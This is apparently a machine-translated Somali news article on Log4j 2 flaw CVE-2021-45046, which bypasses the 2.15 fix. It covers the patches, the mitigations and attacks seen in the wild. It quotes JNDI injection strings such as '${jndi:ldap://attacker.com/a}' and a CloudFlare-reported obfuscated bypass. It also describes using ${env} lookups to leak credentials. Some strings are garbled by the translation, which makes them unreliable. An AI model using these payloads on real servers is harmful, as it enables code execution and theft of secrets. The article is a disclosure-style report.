Warka ayaa la sii daayay goor dhaweyd in uu ahaa la aqoonsaday baylah kale ee fulinta JNDI ee raadinta maktabadda Log4j 2 (CVE-2021-45046), kaas oo dhaca in kasta oo hagaajin lagu daray nooca 2.15 iyo iyadoon loo eegin isticmaalka goobta ilaalinta "log4j2.noFormatMsgLookup".
Dhibaatada Waxay si gaar ah khatar ugu tahay noocyadii hore ee Log4j 2, lagu ilaaliyo calanka "noFormatMsgLookup", maadaama ay kuu ogolaanayso inaad ka gudubto ilaalinta dayacanka hore (Log4Shell, CVE-2021-44228), kaas oo kuu ogolaanaya inaad ku socodsiiso koodka server-ka.
Wixii ah nooca 2.15 isticmaalayaasha, hawlgalku wuxuu ku xaddidan yahay abuurista xaalado joojinta aan caadiga ahayn ee codsiga sababtoo ah daalka agabka la heli karo.
Nuglaanta kaliya waxay saamaysaa nidaamyada adeegsada raadinta macnaha guud, sida $ {ctx: loginId}, ama dunta macnaha guud (MDC), sida% X,% mdc, iyo% MDC, ee diiwaangelinta.
Hawlgalku wuxuu hoos ugu dhacayaa abuurista xaalado si loogu diro xogta ay ku jiraan beddelka JNDI ee diiwaanka marka la isticmaalayo su'aalaha macnaha guud ama qaab-dhismeedka MDC ee codsiga, kaas oo go'aaminaya sharciyada qaabeynta wax soo saarka diiwaanka.
ka Cilmi-baarayaasha LunaSec ayaa xusay marka loo eego noocyada Log4j ee ka hooseeya 2.15, Nuglaantan waxaa loo isticmaali karaa sidii faleebo cusub oo loogu talagalay weerarka Log4Shell, taasoo horseedaysa fulinta koodka haddii tibaaxaha ThreadContext la isticmaalo marka la soo dhejinayo diiwaanka, oo ay ku jiraan xogta dibadda, iyada oo aan loo eegin haddii calanka loo dhigay ilaalin. "NoMsgFormatLookups" ama "% m {nolookups}" template.
Ka gudubka ilaalinta waa la dhimay xaqiiqda ah in bedelka tooska ah "$ {jndi: ldap: //example.com/a}", tibaaxan waxaa lagu bedelay qiimaha doorsoomayaasha dhexe ee loo isticmaalo sharciyada si loo qaabeeyo jeeg diiwaanka.
Tusaale ahaan, haddii codsiga macnaha guud $ {ctx: apiversion} la isticmaalo marka loo dirayo diiwaanka, weerarka waxaa lagu fulin karaa iyadoo lagu bedelayo xogta "$ {jndi: ldap: //attacker.com/a}" ee qiimaha loo qoray doorsoome weecsan.
Nooca Log4j 2.15, nuglaanta waxaa loo isticmaali karaa in lagu fuliyo weerarrada DoS markaad qiyamka u gudubto ThreadContext, kaas oo dhex mara habka wax soo saarka habka wax soo saarka.
In la isku dayo in la xalliyo dhibaatooyinka la kulmay updates 2.16 iyo 2.12.2 ayaa la sii daayay si loo xakameeyo baylahda. Laanta Log4j 2.16, marka lagu daro hagaajinta lagu fuliyay nooca 2.15 iyo xidhitaanka codsiyada JNDI LDAP ee "localhost", asal ahaan shaqaynta JNDI gabi ahaanba waa naafo iyo taageerada qaababka beddelka fariinta waa laga saaray.
Xakameyn ahaan, waxaa la soo jeediyay in laga saaro fasalka JndiLookup wadada fasalka (tusaale, "zip -q -d log4j-core - *. Jar org /apache/logging/log4j/core/lookup/JndiLookup.class").
Sida for tallaabooyinka ay qaadeen mashaariicda kala duwan:
para NginxIyada oo ku saleysan moduleka njs, qoraal ayaa la diyaariyey kaasoo xannibaya gudbinta tibaaxaha JNDI ee cinwaannada HTTP, URIs iyo jirka codsiyada POST. Qoraalka waxaa loo isticmaali karaa server-yada hore si loo ilaaliyo dhabarka dambe.
HAProxy, qawaaniinta qaabeynta ayaa la bixiyaa si loo joojiyo hawlgalka CVE-2021-44228.
Marka lagu daro weeraradii hore loo aqoonsaday ee lagu beegsanayay samaynta botnet ee macdanta cryptocurrency, waxaa la sameeyay ka faa'iidaysiga nuglaanta Log4J 2 si loo faafiyo ransomware xaasidnimo ah oo siraysa waxa ku jira saxannada una baahan madax furasho si loo kala saaro.
Isbaaradu waxay ogaatay ku dhawaad 60 nooc noocyada kala duwan ee ka faa'iidaysiga loo isticmaalo weerarada.
CloudFlare ayaa soo warisay in isku dayada lagu tijaabinayo muujinta nuglaanta Log4j waxaa la aqoonsaday December 1, oo ah, 8 maalmood ka hor shaacinta dadweynaha ee dhibaatada. Isku daygii ugu horreeyay ee ka faa'iidaysiga nuglaanta ayaa la duubay 9 daqiiqo oo keliya ka dib markii macluumaadka la shaaciyay. Warbixinta CloudFlare waxay kaloo xustay isticmaalka beddelka sida "$ {env: FOO: -j} ndi: $ {hoose: L} wuxuu siinayaa $ {hoose: P}" si looga tago maaskarada "jndi: ldap" iyo isticmaalka $ {env} tibaaxaha weerarka si loogu wareejiyo macluumaadka ku saabsan ereyada sirta ah iyo furayaasha gelitaanka ee lagu kaydiyay doorsoomayaasha deegaanka loona wareejiyo server dibadda ah, iyo $ {sys} tibaaxaha si loo ururiyo macluumaadka nidaamka.
Finalmente hadaad xiisaynayso inaad waxbadan ka ogaato waad hubin kartaa xiriirka soo socda.